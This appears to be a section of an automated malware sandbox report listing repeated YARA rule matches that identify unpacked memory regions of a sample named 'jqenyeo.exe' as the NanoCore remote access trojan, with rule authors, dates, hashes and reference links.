      Source: 7.2.jqenyeo.exe.4ae4629.12.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 7.0.jqenyeo.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 7.0.jqenyeo.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 7.0.jqenyeo.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 7.0.jqenyeo.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 7.2.jqenyeo.exe.32f4415.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 7.2.jqenyeo.exe.32f4415.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 7.2.jqenyeo.exe.32f4415.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 7.0.jqenyeo.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 7.0.jqenyeo.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 7.0.jqenyeo.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 7.0.jqenyeo.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 7.2.jqenyeo.exe.5fb140.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 7.2.jqenyeo.exe.5fb140.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 7.2.jqenyeo.exe.5fb140.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 7.2.jqenyeo.exe.5fb140.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 7.2.jqenyeo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 7.2.jqenyeo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 7.2.jqenyeo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 7.2.jqenyeo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 7.2.jqenyeo.exe.22819d4.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 7.2.jqenyeo.exe.22819d4.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 7.2.jqenyeo.exe.22819d4.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 7.2.jqenyeo.exe.550000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 7.2.jqenyeo.exe.550000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 7.2.jqenyeo.exe.550000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 7.2.jqenyeo.exe.550000.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 7.2.jqenyeo.exe.550000.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 7.2.jqenyeo.exe.550000.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 7.2.jqenyeo.exe.550000.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 7.2.jqenyeo.exe.550000.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 7.2.jqenyeo.exe.5fb140.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 7.2.jqenyeo.exe.5fb140.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 7.2.jqenyeo.exe.5fb140.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 7.2.jqenyeo.exe.5fb140.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 7.0.jqenyeo.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 7.0.jqenyeo.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 7.0.jqenyeo.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 7.0.jqenyeo.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 5.2.jqenyeo.exe.330000.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 5.2.jqenyeo.exe.330000.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5.2.jqenyeo.exe.330000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 5.2.jqenyeo.exe.330000.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 5.2.jqenyeo.exe.330000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 5.2.jqenyeo.exe.330000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5.2.jqenyeo.exe.330000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 5.2.jqenyeo.exe.330000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 7.2.jqenyeo.exe.32efdec.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 7.2.jqenyeo.exe.32efdec.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 7.2.jqenyeo.exe.32efdec.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 7.2.jqenyeo.exe.4ae0000.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 7.2.jqenyeo.exe.4ae0000.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 7.2.jqenyeo.exe.4ae0000.11.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 5.2.jqenyeo.exe.341658.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 5.2.jqenyeo.exe.341658.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5.2.jqenyeo.exe.341658.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 5.2.jqenyeo.exe.341658.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 7.2.jqenyeo.exe.32efdec.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 7.2.jqenyeo.exe.32efdec.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 7.2.jqenyeo.exe.32efdec.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 7.2.jqenyeo.exe.414058.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 7.2.jqenyeo.exe.414058.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 7.2.jqenyeo.exe.414058.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 7.2.jqenyeo.exe.414058.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 7.2.jqenyeo.exe.1ed0000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 7.2.jqenyeo.exe.1ed0000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 7.2.jqenyeo.exe.1ed0000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 7.2.jqenyeo.exe.1ed0000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 5.2.jqenyeo.exe.341658.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 5.2.jqenyeo.exe.341658.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5.2.jqenyeo.exe.341658.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 5.2.jqenyeo.exe.341658.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 7.2.jqenyeo.exe.32eafb6.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 7.2.jqenyeo.exe.32eafb6.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 7.2.jqenyeo.exe.32eafb6.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 7.2.jqenyeo.exe.32eafb6.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 7.2.jqenyeo.exe.47b0000.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 7.2.jqenyeo.exe.47b0000.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 7.2.jqenyeo.exe.47b0000.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 7.0.jqenyeo.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 7.0.jqenyeo.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 7.0.jqenyeo.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 7.0.jqenyeo.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 7.0.jqenyeo.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 7.0.jqenyeo.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 7.0.jqenyeo.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 7.0.jqenyeo.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 7.2.jqenyeo.exe.4ae0000.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 7.2.jqenyeo.exe.4ae0000.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 7.2.jqenyeo.exe.4ae0000.11.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 7.2.jqenyeo.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 7.2.jqenyeo.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 7.2.jqenyeo.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
